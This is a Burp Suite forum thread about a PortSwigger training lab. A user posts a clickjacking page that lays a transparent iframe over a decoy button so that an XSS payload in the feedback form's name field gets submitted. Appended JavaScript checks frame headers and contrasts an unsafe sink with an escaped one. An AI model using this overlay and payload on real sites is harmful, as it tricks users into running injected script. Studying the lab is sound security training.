Burp Suite User Forum


Exploiting clickjacking vulnerability to trigger DOM-based XSS - Invalid CSRF token

paulorz | Last updated: Feb 29, 2024 04:11PM UTC

Hi, how's everyone doing? I have been trying to solve this lab, but when doing the clickjacking, the form throws the following error: "Failed to submit feedback: Invalid CSRF token (session does not contain a CSRF token)". Just wanted to let people know that even though the exploit was not functioning correctly in Burp Browser, the attempt in Mozilla did :) This is my attempt at a solution for the lab:

<html>
<head>
<style>
#target_website {
  position: relative;
  width: 800px;
  height: 850px;
  opacity: 0.00001; /* near-invisible frame for the final exploit */
  opacity: 0.5;     /* later declaration wins; handy while aligning the overlay */
  z-index: 2;
}
#decoy_website {
  position: absolute;
  width: 300px;
  height: 400px;
  z-index: 1;
  top: 800px;
  left: 80px;
}
</style>
</head>
<body>
<!-- decoy button sits underneath the transparent frame, lined up with the lab's Submit button -->
<div id="decoy_website">
  <button type="submit">Click me</button>
</div>
<!-- the feedback form is prefilled from the query string; the name parameter carries the payload -->
<iframe id="target_website" src="https://0aab0044038091888ccd8bb6000500ae.web-security-academy.net/feedback?name=%3Cimg%20src=1 onerror=print()%3E&email=agus@agus.com&subject=asd&message=asd">
</iframe>
</body>
</html>

Ben, PortSwigger Agent | Last updated: Mar 01, 2024 01:40PM UTC

Hi, I have just run through this particular lab and was able to solve it using the written solution in conjunction with Burp's browser in the 2024.1.1.3 version of Burp. Are you able to clarify what the exploit that returns that particular error looks like?
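Two checks a practitioner would want alongside the exploit above, as an added example that is not code from the thread, from PortSwigger, or from the lab itself: first, deciding from a page's response headers whether it can be framed at all (the precondition for clickjacking), and second, the prefilled-form sink that turns the `name` parameter into DOM-based XSS, next to an escaped version. The lab's real sink is not shown in the thread; modelling it as innerHTML-style string concatenation of a confirmation message, the attacker origin `https://exploit.example`, and the sample headers are all assumptions made for the example.

```javascript
// Added example (not code from the thread or from the PortSwigger lab).
// Part 1: is a page frameable, judging from its response headers?
// Part 2: the prefilled-form sink that turns the `name` parameter into
// DOM-based XSS, beside an escaped version. The lab's exact sink is not
// shown in the thread; the innerHTML-style string concatenation is assumed.

// Case-insensitive header lookup over a plain {name: value} object.
function getHeader(headers, wanted) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === wanted);
  return key === undefined ? undefined : headers[key];
}

// Returns true when a page served with `headers` can be embedded in an
// <iframe> hosted on `attackerOrigin` (e.g. the exploit server). Mirrors
// browser behaviour for the common cases; wildcard hosts in frame-ancestors
// are not expanded, so an explicit source must equal the attacker origin.
function isFrameable(headers, attackerOrigin) {
  const csp = getHeader(headers, "content-security-policy");
  if (csp) {
    const directive = csp
      .split(";")
      .map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith("frame-ancestors"));
    if (directive) {
      // frame-ancestors, when present, overrides X-Frame-Options.
      const sources = directive
        .split(/\s+/)
        .slice(1)
        .map((s) => s.replace(/^'|'$/g, "").toLowerCase());
      if (sources.includes("none")) return false;
      if (sources.includes("*")) return true;
      return sources.includes(attackerOrigin.toLowerCase());
    }
  }
  const xfo = getHeader(headers, "x-frame-options");
  if (xfo) {
    const value = xfo.trim().toUpperCase();
    if (value === "DENY" || value === "SAMEORIGIN") return false;
    // Any other value (including the obsolete ALLOW-FROM) is ignored by
    // current browsers, so the page stays frameable.
  }
  return true;
}

// The `name` value the victim's feedback form is prefilled with.
function prefilledName(feedbackUrl) {
  return new URL(feedbackUrl).searchParams.get("name") ?? "";
}

// Vulnerable (assumed sink): the confirmation message is assembled as HTML
// and written with innerHTML, so a name of <img src=1 onerror=print()> runs
// once the clickjacked Submit click fires the form handler. Returning the
// markup string keeps the example runnable outside a browser.
function confirmationHtmlUnsafe(name) {
  return "Thank you for submitting feedback, " + name + "!";
}

// Hardened: escape the characters that matter in an HTML text context (in a
// real page, assigning to textContent instead of innerHTML does the same job).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function confirmationHtmlSafe(name) {
  return "Thank you for submitting feedback, " + escapeHtml(name) + "!";
}

// Constructed sample data: headers a frameable lab page and a hardened page
// might send, plus the exploit URL from the post above (space encoded).
const LAB_HEADERS = { "Content-Type": "text/html; charset=utf-8" };
const HARDENED_HEADERS = { "Content-Type": "text/html", "X-Frame-Options": "DENY" };
const EXPLOIT_URL =
  "https://0aab0044038091888ccd8bb6000500ae.web-security-academy.net/feedback" +
  "?name=%3Cimg%20src=1%20onerror=print()%3E&email=agus@agus.com&subject=asd&message=asd";

console.log("lab frameable:", isFrameable(LAB_HEADERS, "https://exploit.example"));
console.log("hardened frameable:", isFrameable(HARDENED_HEADERS, "https://exploit.example"));
console.log("unsafe:", confirmationHtmlUnsafe(prefilledName(EXPLOIT_URL)));
console.log("safe:  ", confirmationHtmlSafe(prefilledName(EXPLOIT_URL)));
```

Run the frameability check against the real lab response before building the overlay: if it returns false, the clickjacking route is closed regardless of how the iframe is styled, and the DOM XSS has to be triggered some other way.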
